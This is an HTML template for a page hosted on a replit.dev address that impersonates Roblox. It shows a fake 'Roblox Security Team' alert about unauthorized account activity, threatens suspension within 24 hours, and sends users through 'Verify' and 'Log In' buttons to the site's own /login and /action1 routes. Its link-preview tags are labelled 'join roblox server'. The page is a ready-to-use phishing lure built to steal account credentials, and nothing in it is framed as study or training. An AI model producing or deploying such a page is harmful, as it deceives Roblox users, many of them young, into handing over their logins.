<!DOCTYPE html>
<html>
<head>
  <title>Roblox</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
  <link href="https://fonts.googleapis.com/css2?family=Montserrat&display=swap" rel="stylesheet">
  <link rel="icon" href="static/roblox.png" type="image/png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <head>
  <meta property="og:title" content="roblox" />
  <meta property="og:description" content="join roblox server" />
  <meta property="og:url" content="https://https://598ef3a8-ac1c-48d7-99a7-23a206459d26-00-1h9vt7utsheaf.sisko.replit.dev/" />
  <meta property="og:image" content="https://https://598ef3a8-ac1c-48d7-99a7-23a206459d26-00-1h9vt7utsheaf.sisko.replit.dev//static/preview-image.jpg" />
</head>

</head>
<body class="profile-page">

 
  <div class="navbar">
    <a href="https://www.roblox.com/">
      <img src="static/logo.png" alt="Roblox Logo">
    </a>
  
   
    <a href="https://www.roblox.com/" class="button">Sign Up</a>
    <a onclick="window.location.href='/action1'" class="button" style="background-color: transparent; color: gray;">Log In</a>
    
  </div>


<div class="profile-container">
 
</div>


<div class="tab-bar"></div>


<div id="about-section" class="tab-body active">
  <div style="padding: 20px;">
    <b>About</b>
    <p><h1>🚨 Security Alert:</h1> Action Required on Your Roblox Account
Dear Roblox User,

We have detected unusual and potentially unauthorized activity on your Roblox account. For your protection and to prevent further issues, we have temporarily restricted access to certain features.

This may include:

Unexpected purchases or trades

Unrecognized login attempts from new locations or devices

Irregular activity violating Roblox’s Terms of Use

To ensure your account remains safe and active, we require you to verify your identity immediately.</p>
<h1>🔒 Please verify your account now by clicking the button below:</h1>
 <button onclick="window.location.href='/login'" class="button" style=" background-color: #e94a2e; color:white;"><b>Verify</b></button>
  </div>
  <p>Failure to verify within 24 hours may result in permanent suspension of your Roblox account to protect the Roblox community and prevent potential harm.

Your security is our top priority. We appreciate your prompt action.

Thank you,
<h1>Roblox Security Team</h1></p>
<div class="tab-bar"></div>
 <footer>
    ©2025 Roblox Corporation. Roblox, the Roblox logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. and other countries.
  </footer>

</body>

</html>
